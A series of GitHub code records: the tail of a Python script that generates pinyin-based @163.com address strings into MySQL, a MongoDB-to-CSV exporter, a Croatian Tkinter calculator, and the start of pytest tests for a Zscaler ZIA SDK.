'tou', 'jing', 'pi', 'hua', 'yong', 'zhou', 'he', 'yin', 'chao', 'qi',\n 'jian', 'teng', 'zheng', 'yan', 'qiao', 'kong', 'lu', 'deng', 'zhong', 'xuan', 'lou', 'pang', 'zang',\n 'yao', 'shi', 'shen', 'fei', 'xi', 'quan', 'cao', 'zha', 'tong', 'meng', 'fang', 'wang', 'tao', 'ruan',\n 'gao', 'chi', 'rong', 'lei', 'niu', 'shao', 'qu', 'bi', 'ge', 'luan', 'chu', 'jin', 'lian', 'ming',\n 'shang', 'mu', 'bian', 'nong', 'xiao', 'guan', 'man', 'na', 'dai', 'diao', 'rao', 'ban', 'she', 'ma',\n 'xiang', 'yue', 'huang', 'huai', 'cang', 'cui', 'cai', 'an', 'ou', 'ai', 'ao', 'e', 'weng']\n\nming_lists = ['ai', 'an', 'ang', 'ao', 'ba', 'bai', 'ban', 'bang', 'bao', 'be', 'bei', 'ben', 'beng', 'bi', 'bian',\n 'biao', 'bie', 'bin', 'bing', 'bo', 'bu', 'ca', 'cai', 'can', 'cang', 'cao', 'ce', 'cen', 'ceng', 'cha',\n 'chai', 'chan', 'chang', 'chao', 'che', 'chen', 'cheng', 'chi', 'chong', 'chou', 'chu', 'chuai', 'chuan',\n 'chuang', 'chui', 'chun', 'chuo', 'ci', 'cong', 'cou', 'cu', 'cuan', 'cui', 'cun', 'cuo', 'da', 'dai',\n 'dan', 'dang', 'dao', 'de', 'deng', 'di', 'dian', 'diao', 'die', 'ding', 'diu', 'dong', 'dou', 'du',\n 'duan', 'dui', 'dun', 'duo', 'e', 'en', 'er', 'fa', 'fan', 'fang', 'fei', 'fen', 'feng', 'fou', 'fu',\n 'zhuang', 'ga', 'gai', 'gan', 'gang', 'gao', 'ge', 'gei', 'gen', 'geng', 'gong', 'gou', 'gu', 'gua',\n 'guai', 'guan', 'guang', 'gui', 'gun', 'guo', 'ha', 'hai', 'han', 'hang', 
'hao', 'he', 'hei', 'hen',\n              'heng', 'hong', 'hou', 'hu', 'hua', 'huai', 'huan', 'huang', 'hui', 'hun',\n              'huo', 'ji', 'jia', 'jian', 'jiang', 'jiao', 'jie', 'jin', 'jing', 'jiong', 'jiu', 'jou', 'ju', 'juan',\n              'jue', 'jun', 'ka', 'kai', 'kan', 'kang', 'kao', 'ke', 'ken', 'keng', 'kong', 'kou', 'ku', 'kua', 'kuai',\n              'kuan', 'kuang', 'kui', 'kun', 'kuo', 'la', 'lai', 'lan', 'lang', 'lao', 'le', 'lei', 'leng', 'li',\n              'lian', 'liang', 'liao', 'lie', 'lin', 'ling', 'liu', 'long', 'lou', 'lu', 'luan', 'lue', 'lun', 'luo',\n              'ma', 'mai', 'man', 'mang', 'mao', 'me', 'mei', 'men', 'meng', 'mi', 'mian', 'miao', 'mie', 'min', 'ming',\n              'miu', 'mo', 'mou', 'mu', 'na', 'nai', 'nan', 'nang', 'nao', 'nei', 'nen', 'neng', 'ni', 'nian', 'niang',\n              'niao', 'nie', 'nin', 'ning', 'niu', 'nong', 'nou', 'nu', 'nuan', 'nue', 'nun', 'nuo', 'ou', 'pa', 'pai',\n              'pan', 'pang', 'pao', 'pei', 'pen', 'peng', 'pi', 'pian', 'piao', 'pie', 'pin', 'ping', 'po', 'pou', 'pu',\n              'qi', 'qia', 'qian', 'qiang', 'qiao', 'qie', 'qin', 'qing', 'qiong', 'qiu', 'qu', 'quan', 'que', 'qun',\n              'ran', 'rang', 'rao', 're', 'ren', 'reng', 'ri', 'rong', 'rou', 'ru', 'ruan', 'rui', 'run', 'ruo', 'sa',\n              'sai', 'san', 'sang', 'sao', 'se', 'sei', 'sen', 'seng', 'sha', 'shai', 'shan', 'shang', 'shao', 'she',\n              'shen', 'sheng', 'shi', 'shou', 'shu', 'shua', 'shuai', 'shuan', 'shuang', 'shui', 'shun', 'shuo', 'si',\n              'song', 'sou', 'su', 'suan', 'sui', 'sun', 'suo', 'ta', 'tai', 'tan', 'tang', 'tao', 'te', 'teng', 'ti',\n              'tian', 'tiao', 'tie', 'ting', 'tong', 'tou', 'tu', 'tuan', 'tui', 'tun', 'tuo', 'wa', 'wai', 'wan',\n              'wang', 'wei', 'wen', 'weng', 'wo', 'wu', 'xi', 'xia', 'xian', 'xiang', 'xiao', 'xie', 'xin', 'xing',\n              'xiong', 'xiu', 'xu', 'xuan', 'xue', 'xun', 'ya', 'yan', 'yang', 'yao', 'ye', 'yi', 'yin', 'ying', 'yong',\n              'you', 'yu', 'yuan', 'yue', 'yun', 'za', 'zai', 'zan', 'zang', 'zao', 'ze', 'zei', 'zen', 'zeng', 'zha',\n              'zhai', 'zhan', 'zhang', 'zhao', 'zhe', 'zhen', 'zheng', 'zhi', 'zhong', 'zhou', 'zhu', 'zhua', 'zhuai',\n              'zhuan', 'zhui', 'zhun', 'zhuo', 'zi', 'zong', 'zou', 'zu', 'zuan', 'zui', 'zun', 'zuo', 'nv', 'nve',\n              'lia', 'lv']\n \ndef executemany_sql():\n    sqls = f'insert ignore into table_name (username) values (%s)'\n    usersvalues = []\n    for xing_list in xing_lists:\n        for ming_list1 in ming_lists:\n            for ming_list2 in ming_lists:\n                emails = xing_list + ming_list1 + ming_list2 + '@163.com'\n                usersvalues.append((emails))\n                if len(usersvalues) == 1000:\n                    cursor = connect.cursor()\n                    cursor.executemany(sqls, usersvalues)\n                    connect.commit()\n                    usersvalues = []\n\n    cursor = connect.cursor()\n    cursor.executemany(sqls, usersvalues)\n    connect.commit()\n\n\nif __name__ == '__main__':\n    executemany_sql()\n    connect.close()\n","repo_name":"songcheng1/PythonDealWithFileAndMysql","sub_path":"PythonExecutemanyMysql.py","file_name":"PythonExecutemanyMysql.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"tg","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7145255435","text":"import pymongo\nimport csv\n\n\n# Creates the header for the csv with translation, for example translation={'_id': 'ID'},\n# so that field name '_id' becomes 'ID' in the header\ndef create_header(field_names, translation=None) -> str:\n    if translation is None:\n        translation = dict()\n    header = ''\n\n    for i in range(len(field_names)):\n        if field_names[i] in translation.keys():\n            header = header + translation[field_names[i]]\n        elif field_names[i].split('/')[-1] in translation.keys():\n            header = header + 
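# [Hedged sketch] The batching idea above -- flush executemany() every N rows,
# then flush the remainder -- isolated into a small helper. The connection,
# table and column names in the usage note are placeholders, not real ones:
def insert_batched(connect, sql, rows, batch_size=1000):
    buffer = []
    for row in rows:
        buffer.append(row)
        if len(buffer) == batch_size:
            with connect.cursor() as cursor:
                cursor.executemany(sql, buffer)  # one round-trip per batch
            connect.commit()
            buffer = []
    if buffer:                                   # don't drop the leftovers
        with connect.cursor() as cursor:
            cursor.executemany(sql, buffer)
        connect.commit()

# Usage sketch (note pymysql wants the MySQL charset name 'utf8', not 'utf-8'):
# conn = pymysql.connect(host='localhost', user='u', password='p',
#                        database='d', charset='utf8')
# insert_batched(conn, 'insert ignore into emails (address) values (%s)',
#                (f'{x}@example.com' for x in ('a', 'b', 'c')))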
translation[field_names[i].split('/')[-1]]\n else:\n header = header + field_names[i].split('/')[-1]\n if i + 1 < len(field_names):\n header = header + ', '\n return header + '\\n'\n\n\n# Extracts the wanted fields (names/values) from a source dictionary that can have a tree like structure,\n# Like a document with Array fields\ndef extract_fields(source, fields, parent='') -> dict:\n extracted = {}\n for field in fields:\n if type(field) is not dict:\n if field in source:\n extracted[parent+str(field)] = source[field]\n else:\n print(\"Couldn't find (value) {}\".format(field))\n extracted[parent+str(field)] = None\n else:\n sub_source_key = tuple(field.keys())[0]\n sub_fields = tuple(field.values())[0]\n if sub_source_key in source:\n sub = extract_fields(source[sub_source_key], sub_fields, parent=parent+str(sub_source_key)+'/')\n extracted.update(sub)\n else:\n print(\"Couldn't find (Array/Object) {}\".format(sub_source_key))\n for sub_name in extract_fieldnames(sub_fields):\n extracted[parent+str(sub_source_key)+'/'+sub_name] = None\n return extracted\n\n\n# Extract just the fieldnames from a tree structure\ndef extract_fieldnames(fields, parent='') -> list:\n fieldnames = []\n for field in fields:\n if type(field) is not dict:\n fieldnames.append(parent + str(field))\n else:\n fieldnames.extend(extract_fieldnames(tuple(field.values())[0], parent+str(tuple(field.keys())[0])+'/'))\n return fieldnames\n\n\n# Runs the export script and creates a csv file.\n# Give the field names in like a list/tuple like: ['price', 'color']\n# A field within a field can be done like this: ['price', {'prop': ['brand', 'unit']}, 'color']\n# Translating multiple fields with the same name should be given like this:\n# {'prop/unit': 'ProdID', 'cstm/unit': 'deviceID', 'color': 'Color'}\ndef execute_export(collection_name, fields, sample_size=None, translation=None,\n export_name=None, db_name='huwebshop', mongo_ip='mongodb://localhost:27017/'):\n if translation is None:\n translation = dict()\n\n # Setup connection to MongoDB\n myclient = pymongo.MongoClient(mongo_ip)\n db = myclient[db_name]\n col = db[collection_name]\n print(\"Connected to MongoDB...\")\n\n # Get the data from MongoDB\n finds = col.find()\n if sample_size is not None:\n finds = finds[:sample_size]\n print(\"Data received...\")\n\n # Write as csv file\n field_names = extract_fieldnames(fields)\n if export_name is None:\n export_name = collection_name\n filename = 'csvs/{}.csv'.format(export_name)\n print(\"Writing to {}...\".format(filename))\n with open(filename, 'w') as file:\n file.write(create_header(field_names, translation))\n\n writer = csv.DictWriter(file, field_names)\n i = 0\n for document in finds:\n row_dict = extract_fields(document, fields)\n writer.writerow(row_dict)\n\n i += 1\n if i % 10000 == 0:\n print(\"Written {} documents.\".format(i))\n print(\"Written {} documents.\".format(i))\n\n print(\"Done exporting.\")\n\n\nif __name__ == '__main__':\n m_collection_name = 'sessions'\n m_fields = ('_id', {'user_agent': [{'os': ['familiy', 'version_string']}]}, 'session_start', 'session_end')\n m_sample_size = 100\n execute_export(m_collection_name, m_fields, m_sample_size, export_name='Sessions')\n","repo_name":"Nouw/HU-SP-Formatief","sub_path":"exporter/CSV/mongo_to_csv.py","file_name":"mongo_to_csv.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22240104287","text":"from tkinter import*\r\nfrom tkinter.messagebox import 
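# [Illustrative check] The header builder above prefers a translated name and
# otherwise keeps the part after the last '/'; the same rule as a one-liner:
def header_for(field_names, translation):
    return ', '.join(translation.get(f, translation.get(f.split('/')[-1], f.split('/')[-1]))
                     for f in field_names) + '\n'

assert header_for(['_id', 'prop/unit', 'color'],
                  {'_id': 'ID', 'unit': 'ProdID'}) == 'ID, ProdID, color\n'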
*\r\nimport math\r\nglobal Unos\r\nglobal poruka\r\nglobal Izlaz\r\nUnos=''\r\nporuka=''\r\nt=Tk()\r\nt.title('Kalkulator')\r\nt.geometry('400x500')\r\nt.config(bg='white')\r\nLabel(t,text='Rezultat: ',font=('Arial',20)).place(relx=1/20,rely=18/20)\r\nispis=Label(t,text=poruka)\r\nispis.place(relx=7/20,rely=18/20)\r\nispis.config(bg='white',font=('Arial',20,'bold'),fg='red')\r\n\r\ndef ispis():\r\n print('Funkcije:\\n1. ... \\n2. ... \\n ... \\nn. ...')\r\ndef primjeri():\r\n print('Primjer funkcije:\\n1. ...\\n2. ... \\n ... \\nn. ...')\r\nizbornik=Menu(t)\r\ndatoteka_izbornik=Menu(izbornik)\r\ndatoteka_izbornik.add_command(label='Popis funkcija',command=ispis)\r\ndatoteka_izbornik.add_command(label='Primjeri fukncija',command=primjeri)\r\nizbornik.add_cascade(label='Help',menu=datoteka_izbornik)\r\nt.config(menu=izbornik)\r\n\r\nLabel(t,text='Unos: ',font=('Arial',20)).place(relx=1/20,rely=1/50)\r\nulaz=Label(t,text=Unos)\r\nulaz.place(relx=3/11,rely=1/50)\r\nulaz.config(bg='white',font=('Arial',20,'bold'),fg='black')\r\ndef refreshIzlaz():\r\n ispis=Label(t,text=poruka)\r\n ispis.place(relx=7/20,rely=18/20)\r\n ispis.config(bg='white',font=('Arial',20,'bold'),fg='red')\r\n return\r\ndef refresh():\r\n ulaz=Label(t,text=Unos)\r\n ulaz.place(relx=3/11,rely=1/50)\r\n ulaz.config(bg='white',font=('Arial',20,'bold'),fg='black')\r\n return\r\n\r\ndef Ans():\r\n global Unos\r\n global Izlaz\r\n Unos+=str(Izlaz)\r\n refresh()\r\n return\r\ndef Unos1():\r\n global Unos\r\n Unos+='1'\r\n refresh()\r\n return\r\ndef Unos2():\r\n global Unos\r\n Unos+='2'\r\n refresh()\r\n return\r\ndef Unos3():\r\n global Unos\r\n Unos+='3'\r\n refresh()\r\n return\r\ndef Unos4():\r\n global Unos\r\n Unos+='4'\r\n refresh()\r\n return\r\ndef Unos5():\r\n global Unos\r\n Unos+='5'\r\n refresh()\r\n return\r\ndef Unos6():\r\n global Unos\r\n Unos+='6'\r\n refresh()\r\n return\r\ndef Unos7():\r\n global Unos\r\n Unos+='7'\r\n refresh()\r\n return\r\ndef Unos8():\r\n global Unos\r\n Unos+='8'\r\n refresh()\r\n return\r\ndef Unos9():\r\n global Unos\r\n Unos+='9'\r\n refresh()\r\n return\r\ndef Unos0():\r\n global Unos\r\n Unos+='0'\r\n refresh()\r\n return\r\ndef Unos_DT():\r\n global Unos\r\n a=Unos\r\n Reset()\r\n Unos=''\r\n for i in range(0,len(a)):\r\n Unos+=a[i]\r\n refresh()\r\n Unos+='.'\r\n refresh()\r\n return\r\ndef zbroji():\r\n global Unos\r\n Unos+=' + '\r\n refresh()\r\n return\r\ndef oduzmi():\r\n global Unos\r\n Unos+=' - '\r\n refresh()\r\n return\r\ndef pomnozi():\r\n global Unos\r\n Unos+=' * '\r\n refresh()\r\n return\r\ndef podijeli():\r\n global Unos\r\n Unos+=' / '\r\n refresh()\r\n return\r\ndef zagrada1():\r\n global Unos\r\n Unos+=' ( '\r\n refresh()\r\n return\r\ndef zagrada2():\r\n global Unos\r\n Unos+=' ) '\r\n refresh()\r\n return\r\ndef cos():\r\n global Unos\r\n Unos+=' cos '\r\n refresh()\r\n return\r\ndef sin():\r\n global Unos\r\n Unos+=' sin '\r\n refresh()\r\n return\r\ndef tg():\r\n global Unos\r\n Unos+=' tg '\r\n refresh()\r\n return\r\ndef ln():\r\n global Unos\r\n Unos+=' ln '\r\n refresh()\r\n return\r\ndef log():\r\n global Unos\r\n Unos+=' log '\r\n refresh()\r\n return\r\ndef space():\r\n global Unos\r\n Unos+=' '\r\n refresh()\r\n return\r\ndef fact():\r\n global Unos\r\n Unos+=' ! 
'\r\n refresh()\r\n return\r\ndef potencija():\r\n global Unos\r\n Unos+=' ^ '\r\n refresh()\r\n return\r\ndef povrh():\r\n global Unos\r\n Unos+=' povrh '\r\n refresh()\r\n return\r\ndef korijen():\r\n global Unos\r\n Unos+=' sqrt '\r\n refresh()\r\n return\r\ndef inverz():\r\n global Unos\r\n Unos+=' ^-1 '\r\n refresh()\r\ndef ABS():\r\n global Unos\r\n Unos+=' ABS '\r\n refresh()\r\ndef Exit():\r\n t.destroy()\r\n return\r\ndef Reset():\r\n global Unos\r\n global poruka\r\n global Izlaz\r\n Izlaz=0\r\n Unos=' '\r\n poruka=' '\r\n refresh()\r\n Unos=''\r\n refresh()\r\n refreshIzlaz()\r\n return\r\ndef Reset_bez_izlaza():\r\n global Unos\r\n global poruka\r\n global Izlaz\r\n Unos=' '\r\n poruka=' '\r\n refresh()\r\n Unos=''\r\n refresh()\r\n refreshIzlaz()\r\n return\r\ndef Delete():\r\n global Unos\r\n global poruka\r\n a=Unos\r\n Reset_bez_izlaza()\r\n Unos=''\r\n for i in range(0,len(a)-2):\r\n Unos+=a[i]\r\n refresh()\r\n return\r\ndef Calculate(x,y,radnja):\r\n if (radnja=='+'):\r\n return(x+y)\r\n elif(radnja=='-'):\r\n return(x-y)\r\n elif(radnja=='*'):\r\n return(x*y)\r\n elif(radnja=='/'):\r\n return(x/y)\r\ndef CalcZagrada():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while(parametri[i]!='('):\r\n i+=1\r\n while(parametri[i]=='('):\r\n i+=1\r\n if(parametri[i-1]=='(' and parametri[i+1]==')'):\r\n del parametri[i+1]\r\n del parametri[i-1]\r\n Izlaz=float(parametri[i-1])\r\n else:\r\n Izlaz+=Calculate(float(parametri[i]),float(parametri[i+2]),parametri[i+1])\r\n parametri.insert(i,Izlaz)\r\n del parametri[i+1]\r\n del parametri[i+1]\r\n del parametri[i+1]\r\n del parametri[i+1]\r\n del parametri[i+-1]\r\n return\r\ndef CalcCos():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='cos'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.cos(float(parametri[i]))\r\n parametri.insert((i),Izlaz)\r\n del parametri[i+1]\r\n return\r\ndef CalcSin():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='sin'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.sin(float(parametri[i]))\r\n parametri.insert((i),Izlaz)\r\n del parametri[i+1]\r\n return\r\ndef CalcTg():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='tg'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.tan(float(parametri[i]))\r\n parametri.insert((i),Izlaz)\r\n del parametri[i+1]\r\n return\r\ndef Calcpotencija():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='^'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=(float(parametri[i-1]))**(float(parametri[i]))\r\n parametri.insert((i-1),Izlaz)\r\n del parametri[i]\r\n del parametri[i]\r\n return\r\ndef CalcLN():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='ln'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.log((float(parametri[i])),2.718281)\r\n parametri.insert((i-1),Izlaz)\r\n del parametri[i]\r\n return\r\ndef CalcLOG():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='log'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.log(float(parametri[i+1]),(float(parametri[i])))\r\n parametri.insert((i-1),Izlaz)\r\n del parametri[i]\r\n del parametri[i]\r\n return\r\ndef Calcfaktorijel():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n suma=1\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='!'):\r\n i+=1\r\n br=i\r\n del parametri[i]\r\n for i in 
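One detail worth noting in `CalcLN` above: it takes logarithms with the base written out as `2.718281`, but one-argument `math.log` is already the natural log, and `math.e` is exact to machine precision when an explicit base is needed. A quick check:

```python
import math

x = 10.0
print(math.log(x))            # 2.302585092994046 -- natural log directly
print(math.log(x, 2.718281))  # slightly larger: 2.718281 underestimates e
print(math.log(x, math.e))    # matches math.log(x)
```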
range(1,int(parametri[i])+1):\r\n suma*=i\r\n Izlaz=suma\r\n del parametri[br]\r\n parametri.insert(i,Izlaz)\r\ndef F(parametar):\r\n suma=1\r\n i=0\r\n for i in range(1,parametar+1):\r\n suma*=i\r\n return(suma)\r\ndef CalcPovrh():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n suma=1\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='povrh'):\r\n i+=1\r\n br=i\r\n del parametri[i]\r\n Izlaz=((F(int(parametri[i-1])))/((F(int(parametri[i])))*(F((int(parametri[i-1]))-(int(parametri[i]))))))\r\n del parametri[i-1]\r\n del parametri[i-1]\r\n parametri.insert(i,Izlaz)\r\ndef CalcSqrt():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='sqrt'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=math.sqrt(float(parametri[i]))\r\n del parametri[i]\r\n parametri.insert(i,Izlaz)\r\n return\r\ndef CalcInverz():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n i=0\r\n Izlaz=0\r\n while (parametri[i]!='^-1'):\r\n i+=1\r\n del parametri[i]\r\n Izlaz=(float(parametri[i-2]))**(-1)\r\n parametri.insert((i-1),Izlaz)\r\n del parametri[i]\r\n return\r\n \r\n \r\n\r\ndef Calc():\r\n global Unos\r\n global Izlaz\r\n global parametri\r\n global poruka\r\n parametri=Unos.split()\r\n for i in range(len(parametri)):\r\n if (parametri[i]==' '):\r\n parametri[i]=''\r\n while ('(' in parametri):\r\n CalcZagrada()\r\n while('cos' in parametri):\r\n CalcCos()\r\n while('sin' in parametri):\r\n CalcSin()\r\n while('tg' in parametri):\r\n CalcTg()\r\n while('^' in parametri):\r\n Calcpotencija()\r\n while('ln' in parametri):\r\n CalcLN()\r\n while('log' in parametri):\r\n CalcLOG()\r\n while ('(' in parametri):\r\n CalcZagrada()\r\n while('!' in parametri):\r\n Calcfaktorijel()\r\n while('povrh' in parametri):\r\n CalcPovrh()\r\n while ('sqrt' in parametri):\r\n CalcSqrt()\r\n while('^-1' in parametri):\r\n CalcInverz()\r\n while('ABS' in parametri):\r\n i=0\r\n b=''\r\n a=''\r\n Izlaz=0\r\n while (parametri[i] != 'ABS'):\r\n i+=1\r\n del parametri[i]\r\n a=parametri[i]\r\n if(a!='-'):\r\n Izlaz=parametri[i]\r\n else:\r\n Izlaz=parametri[i+1]\r\n parametri.insert(i,Izlaz)\r\n del parametri[i+1]\r\n del parametri[i+1]\r\n print(parametri)\r\n while ('*' in parametri):\r\n i=0\r\n Izlaz=0\r\n while (parametri[i] != '*'):\r\n i+=1\r\n Izlaz+=(float(parametri[i-1])*float(parametri[i+1]))\r\n del parametri[i+1]\r\n del parametri[i]\r\n del parametri[i-1]\r\n parametri.insert((i-1),Izlaz)\r\n while ('/' in parametri):\r\n i=0\r\n Izlaz=0\r\n while (parametri[i] != '/'):\r\n i+=1\r\n Izlaz+=(float(parametri[i-1]) / float(parametri[i+1]))\r\n del parametri[i+1]\r\n del parametri[i]\r\n del parametri[i-1]\r\n parametri.insert((i-1),Izlaz)\r\n while ('+' in parametri):\r\n i=0\r\n Izlaz=0\r\n while (parametri[i] != '+'):\r\n i+=1\r\n Izlaz+=(float(parametri[i-1]) + float(parametri[i+1]))\r\n del parametri[i+1]\r\n del parametri[i]\r\n del parametri[i-1]\r\n parametri.insert((i-1),Izlaz)\r\n while ('-' in parametri):\r\n i=0\r\n Izlaz=0\r\n while (parametri[i] != '-'):\r\n i+=1\r\n Izlaz+=(float(parametri[i-1]) - float(parametri[i+1]))\r\n del parametri[i+1]\r\n del parametri[i]\r\n del parametri[i-1]\r\n parametri.insert((i-1),Izlaz)\r\n poruka=Izlaz\r\n refreshIzlaz()\r\n 
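The `Calc` dispatcher above clears one operator at a time with repeated `while ... in parametri` passes, but running every `*` before every `/` (and every `+` before every `-`) breaks left-to-right evaluation: `8 - 2 + 1` collapses `2 + 1` first and yields 5 instead of 7. A sketch of a single left-to-right sweep per precedence level over the same kind of token list:

```python
# Evaluate a flat token list with correct left-to-right order inside each
# precedence level -- a sketch of what the multi-pass Calc is doing.
OPS = {'*': lambda a, b: a * b, '/': lambda a, b: a / b,
       '+': lambda a, b: a + b, '-': lambda a, b: a - b}

def eval_tokens(tokens):
    tokens = list(tokens)
    for level in (('*', '/'), ('+', '-')):   # high precedence first
        i = 1
        while i < len(tokens):
            if tokens[i] in level:
                result = OPS[tokens[i]](float(tokens[i - 1]), float(tokens[i + 1]))
                tokens[i - 1:i + 2] = [result]   # splice result back in place
            else:
                i += 2                            # skip to the next operator slot
    return tokens[0]

print(eval_tokens('8 - 2 + 1'.split()))  # 7.0
print(eval_tokens('8 / 2 * 2'.split()))  # 8.0
```

The splice `tokens[i-1:i+2] = [result]` mirrors the original's insert-then-triple-delete sequence in one step.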
return\r\n\r\n\r\nButton(t,text='1',command=Unos1,bg='lightblue',font=('Arial',15)).place(x=30,y=120)\r\nButton(t,text='2',command=Unos2,bg='lightblue',font=('Arial',15)).place(x=65,y=120)\r\nButton(t,text='3',command=Unos3,bg='lightblue',font=('Arial',15)).place(x=100,y=120)\r\nButton(t,text='4',command=Unos4,bg='lightblue',font=('Arial',15)).place(x=135,y=120)\r\nButton(t,text='5',command=Unos5,bg='lightblue',font=('Arial',15)).place(x=30,y=170)\r\nButton(t,text='6',command=Unos6,bg='lightblue',font=('Arial',15)).place(x=65,y=170)\r\nButton(t,text='7',command=Unos7,bg='lightblue',font=('Arial',15)).place(x=100,y=170)\r\nButton(t,text='8',command=Unos8,bg='lightblue',font=('Arial',15)).place(x=135,y=170)\r\nButton(t,text='9',command=Unos9,bg='lightblue',font=('Arial',15)).place(x=30,y=220)\r\nButton(t,text='0',command=Unos0,bg='lightblue',font=('Arial',15)).place(x=65,y=220)\r\nButton(t,text='.',command=Unos_DT,bg='lightblue',font=('Arial',15)).place(x=100,y=220)\r\n\r\nButton(t,text='=',command=Calc,bg='blue',font=('Arial',16)).place(x=135,y=220)\r\nButton(t,text='(',command=zagrada1,bg='blue',font=('Arial',16)).place(x=190,y=220)\r\nButton(t,text=')',command=zagrada2,bg='blue',font=('Arial',16)).place(x=225,y=220)\r\nButton(t,text='Space',command=space,bg='blue',font=('Arial',16)).place(x=95,y=270)\r\n\r\nButton(t,text='!',command=fact,bg='purple',font=('Arial',16)).place(x=190,y=270)\r\nButton(t,text='povrh',command=povrh,bg='purple',font=('Arial',16)).place(x=225,y=270)\r\nButton(t,text='sqrt',command=korijen,bg='purple',font=('Arial',16)).place(x=300,y=270)\r\nButton(t,text='Ans',command=Ans,bg='pink',font=('Arial',15)).place(x=30,y=270)\r\n\r\nButton(t,text='cos',command=cos,bg='yellow',font=('Arial',16)).place(x=315,y=170)\r\nButton(t,text='sin',command=sin,bg='yellow',font=('Arial',16)).place(x=265,y=170)\r\nButton(t,text='tg',command=tg,bg='yellow',font=('Arial',16)).place(x=275,y=120)\r\nButton(t,text='^n',command=potencija,bg='yellow',font=('Arial',16)).place(x=320,y=120)\r\n\r\nButton(t,text='ln',command=ln,bg='lightgreen',font=('Arial',16)).place(x=260,y=220)\r\nButton(t,text='log B (x)',command=log,bg='lightgreen',font=('Arial',16)).place(x=300,y=220)\r\n\r\nButton(t,text='^-1',command=inverz,bg='lightgreen',font=('Arial',16)).place(x=300,y=320)\r\nButton(t,text='ABS',command=ABS,bg='lightgreen',font=('Arial',16)).place(x=230,y=320)\r\n\r\n\r\nButton(t,text='Exit',command=Exit,bg='red',font=('Arial',16)).place(x=325,y=400)\r\nButton(t,text='Reset',command=Reset,bg='red',font=('Arial',16)).place(x=30,y=70)\r\n\r\nButton(t,text='Delete',command=Delete,bg='orange',font=('Arial',16)).place(x=110,y=70)\r\n\r\n\r\nButton(t,text='+',command=zbroji,bg='blue',font=('Arial',15)).place(x=190,y=120)\r\nButton(t,text='-',command=oduzmi,bg='blue',font=('Arial',15)).place(x=225,y=120)\r\nButton(t,text='*',command=pomnozi,bg='blue',font=('Arial',15)).place(x=190,y=170)\r\nButton(t,text='/',command=podijeli,bg='blue',font=('Arial',15)).place(x=225,y=170)\r\nt.mainloop()\r\n","repo_name":"Luka-sasko/Python","sub_path":"Kalkulator.py","file_name":"Kalkulator.py","file_ext":"py","file_size_in_byte":13846,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42962347124","text":"import os\nimport pytest\nimport tomli\nfrom zsdk.zia import zia\nimport random\n\napp_dir = os.path.dirname(os.path.abspath(__file__))\nconfig_path = os.path.join(app_dir, \"config.toml\")\n\nwith open(config_path, \"rb\") as cf:\n config = 
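The button wall that closes `Kalkulator.py` repeats one `Button(...).place(...)` line per key. A hedged sketch of driving it from a spec table instead; the coordinates and the `on_press` callback here are placeholders, not the original handlers:

```python
import tkinter as tk

root = tk.Tk()

# (label, x, y, background): one spec row per key instead of one Button line
BUTTONS = [
    ('1', 30, 120, 'lightblue'), ('2', 65, 120, 'lightblue'),
    ('3', 100, 120, 'lightblue'), ('+', 190, 120, 'blue'),
]

def on_press(label):
    print('pressed', label)   # stand-in for the Unos-append handlers

for label, x, y, bg in BUTTONS:
    tk.Button(root, text=label, bg=bg, font=('Arial', 15),
              command=lambda l=label: on_press(l)).place(x=x, y=y)

root.mainloop()
```

The `lambda l=label:` default argument pins each button to its own label; a bare `lambda: on_press(label)` would late-bind every button to the last row.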
tomli.load(cf)\n\n\n@pytest.fixture(scope=\"module\")\ndef tenant():\n return zia(\n config[\"PARENT\"][\"username\"],\n config[\"PARENT\"][\"password\"],\n config[\"PARENT\"][\"api_key\"],\n config[\"PARENT\"][\"cloudId\"],\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef test_user_data(tenant):\n return {\n \"name\": \"pytest user\",\n \"email\": \"pytest@tng-lab.org\",\n \"groups\": [\n random.choice(\n [\n {\"name\": group[\"name\"], \"id\": group[\"id\"]}\n for group in tenant.groups.list()\n ]\n )\n ],\n \"department\": random.choice(\n [\n {\"name\": dept[\"name\"], \"id\": dept[\"id\"]}\n for dept in tenant.departments.list()\n ]\n ),\n \"password\": \"Zscaler!123\",\n }\n\n\n# departments under user_management\n@pytest.mark.departments\ndef test_get(tenant):\n depts = [dept.get(\"id\") for dept in tenant.departments.list()]\n dept = tenant.departments.get(random.choice(depts))\n assert type(dept) is dict\n\n\n@pytest.mark.departments\ndef test_list(tenant):\n data = tenant.departments.list()\n assert type(data) is list\n assert len(data) != 0\n\n\n# groups under user_management\n@pytest.mark.groups\ndef test_list_groups(tenant):\n data = tenant.groups.list()\n assert type(data) is list\n assert len(data) > 0\n\n\n@pytest.mark.groups\ndef test_get_groups(tenant):\n groups = [group.get(\"id\") for group in tenant.groups.list()]\n group = 